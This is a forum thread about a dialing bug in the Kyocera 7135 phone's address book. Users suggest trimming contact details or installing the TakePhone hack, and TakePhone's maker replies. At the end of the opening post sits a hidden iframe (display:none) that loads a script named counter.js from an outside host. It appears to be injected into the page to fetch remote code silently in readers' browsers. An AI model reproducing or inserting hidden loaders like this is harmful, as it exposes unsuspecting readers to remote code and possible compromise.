+ Reply to Thread

Dialing from Address Book Limitation?

One of the great improvements in the dialing from address book function in the 7135 is the ability to go right back to the same person's name after they don't answer using the address button, click down to the next or alternate number and press the phone button to dial it.

I have noticed, however, that where I have entered company and job title descriptions for a person in the address book, it will not dial the third number or sometimes even the second one. When I delete that information it will, all of a sudden, allow me to scroll down to the second or third number and dial it when I push the green button.

Is this just my phone or has anyone else tried to dial a third number for someone using this method and simply have the phone revert to the main phone screen upon pushing the green button as if no number were selected at all.

I am using the address book that came with the phone.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I recall a prior thread (or a FAQ)on this. There is a bug in a program that occurs if you put "too much" information in the address book.

I think the fix was to do what you did, limit the information on the person.

A search of this board should find the thread.

I had a similar problem and posted it. What seemed to fix it was downloading TakePhone to my PC and installing the TakePhone hack on my 7135. (Also installed then deleted TakePhone app - didn't care for it). Since then, seem to be able to dial up to 5th #. Disabling TakePhone hack seemed to resurrect the problem. Hope the fix keeps working. So far, so good. Don't know why it works.
    Oxo

Originally posted by Oxojim
    I had a similar problem and posted it. What seemed to fix it was downloading TakePhone to my PC and installing the TakePhone hack on my 7135. (Also installed then deleted TakePhone app - didn't care for it). Since then, seem to be able to dial up to 5th #. Disabling TakePhone hack seemed to resurrect the problem. Hope the fix keeps working. So far, so good. Don't know why it works.
    Glad to ear you found SOME use for TAKEphONE ...
    Shimon Shnitzer
    Maker of TAKEphONE -
    "Take telephony into your Palm"